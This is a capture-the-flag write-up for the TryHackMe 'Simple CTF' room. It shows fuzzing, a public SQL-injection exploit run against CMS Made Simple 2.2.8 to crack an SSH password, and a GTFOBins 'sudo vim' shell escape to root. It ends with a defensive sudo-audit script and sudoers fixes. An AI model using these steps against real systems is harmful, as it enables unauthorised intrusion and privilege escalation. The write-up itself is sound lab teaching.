TryHackMe - Simple CTF (Easy)
Author: ret2basic

Summary

FFUF finds a /simple directory on port 80 that hosts CMS Made Simple 2.2.8. This version has an unauthenticated SQL injection exploit. The exploit recovers an SSH credential for us, and we SSH in to get a user shell.
In the privilege escalation phase, sudo -l shows that we are able to run Vim as root. Use a payload from GTFOBins to get a root shell.

IP

    RHOST: 10.10.74.168
    LHOST: 10.13.12.2

Nmap

(screenshot: Nmap scan results)

FFUF

Run FFUF:
    $ ffuf -u http://10.10.74.168/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .php,.html,.txt -fc 400,401,403
FFUF finds /robots.txt and /simple:
(screenshot: FFUF results showing /robots.txt and /simple)

User Shell: CMS Made Simple 2.2.8 Unauthenticated SQL Injection

Version number is leaked on /simple:
CMS Made Simple version 2.2.8
Searchsploit:
(screenshot: searchsploit results for CMS Made Simple 2.2.8)
Install termcolor:
    $ python2 -m pip install termcolor
Run the exploit:
    $ ./sqli.py -u http://10.10.74.168/simple --crack -w /usr/share/wordlists/rockyou.txt
The exploit finds a credential mitch:secret:
(screenshot: cracked credential mitch:secret)
Try SSH in:
    $ ssh mitch@10.10.74.168 -p 2222
Now we have a user shell:
(screenshot: user shell as mitch)

Privilege Escalation: Sudo Vim

sudo -l:
(screenshot: sudo -l output showing /usr/bin/vim as root)
Use the payload from GTFOBins:
    $ sudo vim -c ':!/bin/sh'
Now we have a root shell:
(screenshot: root shell)
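The root cause of this privilege escalation is a sudo rule that grants a root-run editor, and editors have shell escapes. The following audit helper is an added example written for this writeup (it is not part of TryHackMe, the room, or any tool used above): it parses the text that sudo -l prints and flags rules that run a known shell-escape-capable program as root. The sudo -l output embedded in it is constructed for the demo, and the list of flagged binaries is a small hypothetical subset of the GTFOBins sudo entries.

```python
#!/usr/bin/env python3
"""Flag sudo rules that hand out a root shell through an editor or pager.

Added audit helper for this writeup, not part of the room or its tooling.
It parses `sudo -l` output and reports commands that can spawn a shell, so
the /usr/bin/vim rule abused above shows up as a finding.
"""
import re

# Subset of programs with a well-known shell escape when run as root
# (hypothetical short list modelled on GTFOBins; extend as needed).
SHELL_ESCAPE_BINARIES = {
    "vim", "vi", "nano", "less", "more", "man", "awk", "find",
    "python", "python3", "perl", "bash", "sh", "env",
}

# Constructed sample of `sudo -l` output for the demo.
SAMPLE_SUDO_L = """\
Matching Defaults entries for mitch on Machine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl status nginx
    (www-data) /usr/bin/less /var/log/nginx/access.log
"""

# "(runas) TAG: TAG: command, command" -> runas, tags, command list
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudo_l(text):
    """Return a list of (runas, tags, command) tuples from `sudo -l` output."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        # Rules start after the "User X may run the following commands" line.
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        # Several commands may share one rule line, separated by commas.
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), tags, cmd.strip()))
    return rules


def find_shell_escapes(rules):
    """Return (runas, command, reason) for rules that yield a root shell."""
    findings = []
    for runas, tags, cmd in rules:
        runs_as_root = "root" in runas or "ALL" in runas
        if cmd == "ALL" and runs_as_root:
            findings.append((runas, cmd, "all commands permitted as root"))
            continue
        basename = cmd.split()[0].rsplit("/", 1)[-1]
        if basename in SHELL_ESCAPE_BINARIES and runs_as_root:
            reason = f"{basename} can spawn an interactive shell as root; "
            reason += "NOPASSWD" if "NOPASSWD" in tags else "password required"
            findings.append((runas, cmd, reason))
    return findings


if __name__ == "__main__":
    for runas, cmd, reason in find_shell_escapes(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"[!] ({runas}) {cmd}: {reason}")
```

Run against the constructed sample, only the vim rule is reported; the systemctl rule is not a shell-escape binary and the less rule runs as www-data rather than root. The fix is to drop the rule, or, if root-run editing is genuinely required, use sudoedit or add `Defaults!/usr/bin/vim noexec` to sudoers so the editor cannot exec a child process.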